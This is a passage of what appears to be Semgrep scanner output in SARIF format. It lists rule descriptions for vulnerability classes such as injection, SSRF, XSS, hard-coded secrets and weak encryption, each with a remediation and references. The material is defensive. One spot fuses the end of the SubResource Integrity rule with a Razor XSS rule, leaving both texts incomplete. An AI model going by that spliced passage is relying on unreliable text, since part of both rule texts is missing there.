requests sent via Java Spring RestTemplate API to http:// URLS. This is dangerous because the server is attempting to connect to a website that does not encrypt traffic with TLS. Instead, send requests only to https:// URLS."},"helpUri":"https://semgrep.dev/r/problem-based-packs.insecure-transport.java-spring.spring-http-request.spring-http-request","id":"problem-based-packs.insecure-transport.java-spring.spring-http-request.spring-http-request","name":"problem-based-packs.insecure-transport.java-spring.spring-http-request.spring-http-request","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","MEDIUM CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: problem-based-packs.insecure-transport.java-spring.spring-http-request.spring-http-request"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application might dynamically evaluate untrusted input, which can lead to a code injection vulnerability. An attacker can execute arbitrary code, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing code containing user input. If this is unavoidable, validate and sanitize the input, and use safe alternatives for evaluating user input."},"help":{"markdown":"The application might dynamically evaluate untrusted input, which can lead to a code injection vulnerability. An attacker can execute arbitrary code, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing code containing user input. If this is unavoidable, validate and sanitize the input, and use safe alternatives for evaluating user input.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/php.lang.security.tainted-code-execution.tainted-code-execution)\n - [https://owasp.org/www-community/attacks/Code_Injection](https://owasp.org/www-community/attacks/Code_Injection)\n - [https://stackoverflow.com/questions/3115559/exploitable-php-functions](https://stackoverflow.com/questions/3115559/exploitable-php-functions)\n - [https://github.com/FloeDesignTechnologies/phpcs-security-audit/blob/master/Security/Sniffs/BadFunctions/NoEvalsSniff.php](https://github.com/FloeDesignTechnologies/phpcs-security-audit/blob/master/Security/Sniffs/BadFunctions/NoEvalsSniff.php)\n","text":"The application might dynamically evaluate untrusted input, which can lead to a code injection vulnerability. An attacker can execute arbitrary code, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing code containing user input. If this is unavoidable, validate and sanitize the input, and use safe alternatives for evaluating user input."},"helpUri":"https://semgrep.dev/r/php.lang.security.tainted-code-execution.tainted-code-execution","id":"php.lang.security.tainted-code-execution.tainted-code-execution","name":"php.lang.security.tainted-code-execution.tainted-code-execution","properties":{"precision":"very-high","tags":["CWE-94: Improper Control of Generation of Code ('Code Injection')","MEDIUM CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: php.lang.security.tainted-code-execution.tainted-code-execution"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"Detected string concatenation with a non-literal variable in a util.format / console.log function. If an attacker injects a format specifier in the string, it will forge the log message. Try to use constant values for the format string."},"help":{"markdown":"Detected string concatenation with a non-literal variable in a util.format / console.log function. If an attacker injects a format specifier in the string, it will forge the log message. Try to use constant values for the format string.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.lang.security.audit.unsafe-formatstring.unsafe-formatstring)\n - [https://cwe.mitre.org/data/definitions/134.html](https://cwe.mitre.org/data/definitions/134.html)\n","text":"Detected string concatenation with a non-literal variable in a util.format / console.log function. If an attacker injects a format specifier in the string, it will forge the log message. Try to use constant values for the format string."},"helpUri":"https://semgrep.dev/r/javascript.lang.security.audit.unsafe-formatstring.unsafe-formatstring","id":"javascript.lang.security.audit.unsafe-formatstring.unsafe-formatstring","name":"javascript.lang.security.audit.unsafe-formatstring.unsafe-formatstring","properties":{"precision":"very-high","tags":["CWE-134: Use of Externally-Controlled Format String","LOW CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.lang.security.audit.unsafe-formatstring.unsafe-formatstring"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"This hashing algorithm is insecure. If this hash is used in a security context, such as password hashing, it should be converted to a stronger hashing algorithm."},"help":{"markdown":"This hashing algorithm is insecure. If this hash is used in a security context, such as password hashing, it should be converted to a stronger hashing algorithm.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.passlib.passlib-insecure-hash.passlib-insecure-hash)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n - [https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/09-Testing_for_Weak_Cryptography/04-Testing_for_Weak_Encryption](https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/09-Testing_for_Weak_Cryptography/04-Testing_for_Weak_Encryption)\n","text":"This hashing algorithm is insecure. If this hash is used in a security context, such as password hashing, it should be converted to a stronger hashing algorithm."},"helpUri":"https://semgrep.dev/r/python.passlib.passlib-insecure-hash.passlib-insecure-hash","id":"python.passlib.passlib-insecure-hash.passlib-insecure-hash","name":"python.passlib.passlib-insecure-hash.passlib-insecure-hash","properties":{"precision":"very-high","tags":["CWE-328: Use of Weak Hash","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: python.passlib.passlib-insecure-hash.passlib-insecure-hash"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected admin access granted in your policy. This means anyone with this policy can perform administrative actions. Instead, limit actions and resources to what you need according to least privilege."},"help":{"markdown":"Detected admin access granted in your policy. This means anyone with this policy can perform administrative actions. Instead, limit actions and resources to what you need according to least privilege.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.aws-iam-admin-policy.aws-iam-admin-policy)\n - [https://cwe.mitre.org/data/definitions/732.html](https://cwe.mitre.org/data/definitions/732.html)\n","text":"Detected admin access granted in your policy. This means anyone with this policy can perform administrative actions. Instead, limit actions and resources to what you need according to least privilege."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.aws-iam-admin-policy.aws-iam-admin-policy","id":"terraform.aws.security.aws-iam-admin-policy.aws-iam-admin-policy","name":"terraform.aws.security.aws-iam-admin-policy.aws-iam-admin-policy","properties":{"precision":"very-high","tags":["CWE-732: Incorrect Permission Assignment for Critical Resource","MEDIUM CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.aws-iam-admin-policy.aws-iam-admin-policy"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"This socket is not encrypted. The traffic could be read by an attacker intercepting the network traffic. Use an SSLSocket created by 'SSLSocketFactory' or 'SSLServerSocketFactory' instead"},"help":{"markdown":"This socket is not encrypted. The traffic could be read by an attacker intercepting the network traffic. Use an SSLSocket created by 'SSLSocketFactory' or 'SSLServerSocketFactory' instead\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/kotlin.lang.security.unencrypted-socket.unencrypted-socket)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"This socket is not encrypted. The traffic could be read by an attacker intercepting the network traffic. Use an SSLSocket created by 'SSLSocketFactory' or 'SSLServerSocketFactory' instead"},"helpUri":"https://semgrep.dev/r/kotlin.lang.security.unencrypted-socket.unencrypted-socket","id":"kotlin.lang.security.unencrypted-socket.unencrypted-socket","name":"kotlin.lang.security.unencrypted-socket.unencrypted-socket","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","LOW CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: kotlin.lang.security.unencrypted-socket.unencrypted-socket"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application was observed to utilize Realm for data storage, but was not observed to set an encryption key. When no encryption key is set in the configuration, no encryption is used. To protect user and application data, the application should specify an encryption key, which is randomly generated per user, per client."},"help":{"markdown":"The application was observed to utilize Realm for data storage, but was not observed to set an encryption key. When no encryption key is set in the configuration, no encryption is used. To protect user and application data, the application should specify an encryption key, which is randomly generated per user, per client.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/swift.commoncrypto.realmstate-encryption-missing.swift-hardcoded-realm-without-encryption)\n - [https://ali-akhtar.medium.com/realm-custom-configuration-and-encryption-realmswift-part-3-f991f090ae22](https://ali-akhtar.medium.com/realm-custom-configuration-and-encryption-realmswift-part-3-f991f090ae22)\n - [https://mas.owasp.org/MASVS/controls/MASVS-STORAGE-1/](https://mas.owasp.org/MASVS/controls/MASVS-STORAGE-1/)\n - [https://mas.owasp.org/MASVS/controls/MASVS-CRYPTO-1/](https://mas.owasp.org/MASVS/controls/MASVS-CRYPTO-1/)\n","text":"The application was observed to utilize Realm for data storage, but was not observed to set an encryption key. When no encryption key is set in the configuration, no encryption is used. To protect user and application data, the application should specify an encryption key, which is randomly generated per user, per client."},"helpUri":"https://semgrep.dev/r/swift.commoncrypto.realmstate-encryption-missing.swift-hardcoded-realm-without-encryption","id":"swift.commoncrypto.realmstate-encryption-missing.swift-hardcoded-realm-without-encryption","name":"swift.commoncrypto.realmstate-encryption-missing.swift-hardcoded-realm-without-encryption","properties":{"precision":"very-high","tags":["CWE-311: Missing Encryption of Sensitive Data","MEDIUM CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","OWASP-A04:2021 - Insecure Design","security"]},"shortDescription":{"text":"Semgrep Finding: swift.commoncrypto.realmstate-encryption-missing.swift-hardcoded-realm-without-encryption"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.express.db.pg-express.pg-express)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"helpUri":"https://semgrep.dev/r/javascript.express.db.pg-express.pg-express","id":"javascript.express.db.pg-express.pg-express","name":"javascript.express.db.pg-express.pg-express","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.express.db.pg-express.pg-express"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.lang.hardcoded.tokens.hardcoded-github-pat.hardcoded-github-pat)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/javascript.lang.hardcoded.tokens.hardcoded-github-pat.hardcoded-github-pat","id":"javascript.lang.hardcoded.tokens.hardcoded-github-pat.hardcoded-github-pat","name":"javascript.lang.hardcoded.tokens.hardcoded-github-pat.hardcoded-github-pat","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.lang.hardcoded.tokens.hardcoded-github-pat.hardcoded-github-pat"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Checks for creation of telnet servers or attempts to connect through telnet. This is insecure as the telnet protocol supports no encryption, and data passes through unencrypted."},"help":{"markdown":"Checks for creation of telnet servers or attempts to connect through telnet. This is insecure as the telnet protocol supports no encryption, and data passes through unencrypted.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/problem-based-packs.insecure-transport.ruby-stdlib.net-telnet-request.net-telnet-request)\n - [https://docs.ruby-lang.org/en/2.2.0/Net/Telnet.html](https://docs.ruby-lang.org/en/2.2.0/Net/Telnet.html)\n - [https://www.rubydoc.info/gems/net-ssh-telnet2/0.1.0/Net/SSH/Telnet](https://www.rubydoc.info/gems/net-ssh-telnet2/0.1.0/Net/SSH/Telnet)\n","text":"Checks for creation of telnet servers or attempts to connect through telnet. This is insecure as the telnet protocol supports no encryption, and data passes through unencrypted."},"helpUri":"https://semgrep.dev/r/problem-based-packs.insecure-transport.ruby-stdlib.net-telnet-request.net-telnet-request","id":"problem-based-packs.insecure-transport.ruby-stdlib.net-telnet-request.net-telnet-request","name":"problem-based-packs.insecure-transport.ruby-stdlib.net-telnet-request.net-telnet-request","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","MEDIUM CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: problem-based-packs.insecure-transport.ruby-stdlib.net-telnet-request.net-telnet-request"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build an LDAP query, which can allow attackers to run arbitrary LDAP queries. If an LDAP query must contain untrusted input then it must be escaped. Ensure data passed to an LDAP query is not controllable or properly sanitize the user input with functions like createEqualityFilter."},"help":{"markdown":"Untrusted input might be used to build an LDAP query, which can allow attackers to run arbitrary LDAP queries. If an LDAP query must contain untrusted input then it must be escaped. Ensure data passed to an LDAP query is not controllable or properly sanitize the user input with functions like createEqualityFilter.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.servlets.security.tainted-ldapi-from-http-request-deepsemgrep.tainted-ldapi-from-http-request-deepsemgrep)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build an LDAP query, which can allow attackers to run arbitrary LDAP queries. If an LDAP query must contain untrusted input then it must be escaped. Ensure data passed to an LDAP query is not controllable or properly sanitize the user input with functions like createEqualityFilter."},"helpUri":"https://semgrep.dev/r/java.servlets.security.tainted-ldapi-from-http-request-deepsemgrep.tainted-ldapi-from-http-request-deepsemgrep","id":"java.servlets.security.tainted-ldapi-from-http-request-deepsemgrep.tainted-ldapi-from-http-request-deepsemgrep","name":"java.servlets.security.tainted-ldapi-from-http-request-deepsemgrep.tainted-ldapi-from-http-request-deepsemgrep","properties":{"precision":"very-high","tags":["CWE-90: Improper Neutralization of Special Elements used in an LDAP Query ('LDAP Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: java.servlets.security.tainted-ldapi-from-http-request-deepsemgrep.tainted-ldapi-from-http-request-deepsemgrep"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/kotlin.jedis.jedis-auth-hardcoded-secret.jedis-auth-hardcoded-secret)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"helpUri":"https://semgrep.dev/r/kotlin.jedis.jedis-auth-hardcoded-secret.jedis-auth-hardcoded-secret","id":"kotlin.jedis.jedis-auth-hardcoded-secret.jedis-auth-hardcoded-secret","name":"kotlin.jedis.jedis-auth-hardcoded-secret.jedis-auth-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: kotlin.jedis.jedis-auth-hardcoded-secret.jedis-auth-hardcoded-secret"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Consuming CDNs without including a SubResource Integrity (SRI) can expose your application and its users to compromised code. SRIs allow you to consume specific versions of content where if even a single byte is compromised, the resource will not be loaded. Add an integrity attribute to your ` is not properly encoded."},"help":{"markdown":"Unencoded JSON in HTML context is vulnerable to cross-site scripting, because `` is not properly encoded.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.razor.security.html-raw-json.html-raw-json)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Unencoded JSON in HTML context is vulnerable to cross-site scripting, because `` is not properly encoded."},"helpUri":"https://semgrep.dev/r/csharp.razor.security.html-raw-json.html-raw-json","id":"csharp.razor.security.html-raw-json.html-raw-json","name":"csharp.razor.security.html-raw-json.html-raw-json","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.razor.security.html-raw-json.html-raw-json"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected input from a HTTPServletRequest going into an LDAP query. This could lead to LDAP injection if the input is not properly sanitized, which could result in attackers modifying objects in the LDAP tree structure. Ensure data passed to an LDAP query is not controllable or properly sanitize the data."},"help":{"markdown":"Detected input from a HTTPServletRequest going into an LDAP query. This could lead to LDAP injection if the input is not properly sanitized, which could result in attackers modifying objects in the LDAP tree structure. Ensure data passed to an LDAP query is not controllable or properly sanitize the data.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.tainted-ldapi-from-http-request.tainted-ldapi-from-http-request)\n - [https://sensei.securecodewarrior.com/recipes/scw%3Ajava%3ALDAP-injection](https://sensei.securecodewarrior.com/recipes/scw%3Ajava%3ALDAP-injection)\n","text":"Detected input from a HTTPServletRequest going into an LDAP query. This could lead to LDAP injection if the input is not properly sanitized, which could result in attackers modifying objects in the LDAP tree structure. Ensure data passed to an LDAP query is not controllable or properly sanitize the data."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.tainted-ldapi-from-http-request.tainted-ldapi-from-http-request","id":"java.lang.security.audit.tainted-ldapi-from-http-request.tainted-ldapi-from-http-request","name":"java.lang.security.audit.tainted-ldapi-from-http-request.tainted-ldapi-from-http-request","properties":{"precision":"very-high","tags":["CWE-90: Improper Neutralization of Special Elements used in an LDAP Query ('LDAP Injection')","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.tainted-ldapi-from-http-request.tainted-ldapi-from-http-request"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Ensure FSX ONTAP file system is encrypted at rest using KMS CMKs. CMKs gives you control over the encryption key in terms of access and rotation."},"help":{"markdown":"Ensure FSX ONTAP file system is encrypted at rest using KMS CMKs. CMKs gives you control over the encryption key in terms of access and rotation.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.aws-fsx-ontapfs-encrypted-with-cmk.aws-fsx-ontapfs-encrypted-with-cmk)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"Ensure FSX ONTAP file system is encrypted at rest using KMS CMKs. CMKs gives you control over the encryption key in terms of access and rotation."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.aws-fsx-ontapfs-encrypted-with-cmk.aws-fsx-ontapfs-encrypted-with-cmk","id":"terraform.aws.security.aws-fsx-ontapfs-encrypted-with-cmk.aws-fsx-ontapfs-encrypted-with-cmk","name":"terraform.aws.security.aws-fsx-ontapfs-encrypted-with-cmk.aws-fsx-ontapfs-encrypted-with-cmk","properties":{"precision":"very-high","tags":["CWE-320: CWE CATEGORY: Key Management Errors","LOW CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.aws-fsx-ontapfs-encrypted-with-cmk.aws-fsx-ontapfs-encrypted-with-cmk"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Initializing a security context for Dask (`distributed`) without \"require_encryption\" keyword argument may silently fail to provide security."},"help":{"markdown":"Initializing a security context for Dask (`distributed`) without \"require_encryption\" keyword argument may silently fail to provide security.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.distributed.security.require-encryption)\n - [https://distributed.dask.org/en/latest/tls.html?highlight=require_encryption#parameters](https://distributed.dask.org/en/latest/tls.html?highlight=require_encryption#parameters)\n","text":"Initializing a security context for Dask (`distributed`) without \"require_encryption\" keyword argument may silently fail to provide security."},"helpUri":"https://semgrep.dev/r/python.distributed.security.require-encryption","id":"python.distributed.security.require-encryption","name":"python.distributed.security.require-encryption","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: python.distributed.security.require-encryption"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected use of dynamic execution of JavaScript which may come from user-input, which can lead to Cross-Site-Scripting (XSS). Where possible avoid including user-input in functions which dynamically execute user-input."},"help":{"markdown":"Detected use of dynamic execution of JavaScript which may come from user-input, which can lead to Cross-Site-Scripting (XSS). Where possible avoid including user-input in functions which dynamically execute user-input.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.lang.security.detect-eval-with-expression.detect-eval-with-expression)\n - [https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/eval#never_use_eval!](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/eval#never_use_eval!)\n","text":"Detected use of dynamic execution of JavaScript which may come from user-input, which can lead to Cross-Site-Scripting (XSS). Where possible avoid including user-input in functions which dynamically execute user-input."},"helpUri":"https://semgrep.dev/r/javascript.lang.security.detect-eval-with-expression.detect-eval-with-expression","id":"javascript.lang.security.detect-eval-with-expression.detect-eval-with-expression","name":"javascript.lang.security.detect-eval-with-expression.detect-eval-with-expression","properties":{"precision":"very-high","tags":["CWE-95: Improper Neutralization of Directives in Dynamically Evaluated Code ('Eval Injection')","MEDIUM CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.lang.security.detect-eval-with-expression.detect-eval-with-expression"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module)."},"help":{"markdown":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.pymssql.python-pymssql-empty-password.python-pymssql-empty-password)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module)."},"helpUri":"https://semgrep.dev/r/python.pymssql.python-pymssql-empty-password.python-pymssql-empty-password","id":"python.pymssql.python-pymssql-empty-password.python-pymssql-empty-password","name":"python.pymssql.python-pymssql-empty-password.python-pymssql-empty-password","properties":{"precision":"very-high","tags":["CWE-287: Improper Authentication","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.pymssql.python-pymssql-empty-password.python-pymssql-empty-password"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"'syscall' is essentially unsafe and unportable. The DL (https://apidock.com/ruby/Fiddle) library is preferred for safer and a bit more portable programming."},"help":{"markdown":"'syscall' is essentially unsafe and unportable. The DL (https://apidock.com/ruby/Fiddle) library is preferred for safer and a bit more portable programming.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.lang.security.dangerous-syscall.dangerous-syscall)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"'syscall' is essentially unsafe and unportable. The DL (https://apidock.com/ruby/Fiddle) library is preferred for safer and a bit more portable programming."},"helpUri":"https://semgrep.dev/r/ruby.lang.security.dangerous-syscall.dangerous-syscall","id":"ruby.lang.security.dangerous-syscall.dangerous-syscall","name":"ruby.lang.security.dangerous-syscall.dangerous-syscall","properties":{"precision":"very-high","tags":["CWE-94: Improper Control of Generation of Code ('Code Injection')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.lang.security.dangerous-syscall.dangerous-syscall"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"help":{"markdown":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.net.tainted-flask-http-request-paramiko.tainted-flask-http-request-paramiko)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29)\n","text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"helpUri":"https://semgrep.dev/r/python.flask.net.tainted-flask-http-request-paramiko.tainted-flask-http-request-paramiko","id":"python.flask.net.tainted-flask-http-request-paramiko.tainted-flask-http-request-paramiko","name":"python.flask.net.tainted-flask-http-request-paramiko.tainted-flask-http-request-paramiko","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","MEDIUM CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.net.tainted-flask-http-request-paramiko.tainted-flask-http-request-paramiko"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"X-XSS-Protection header is set to 0. This will disable the browser's XSS Filter."},"help":{"markdown":"X-XSS-Protection header is set to 0. This will disable the browser's XSS Filter.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/typescript.nestjs.security.audit.nestjs-header-xss-disabled.nestjs-header-xss-disabled)\n - 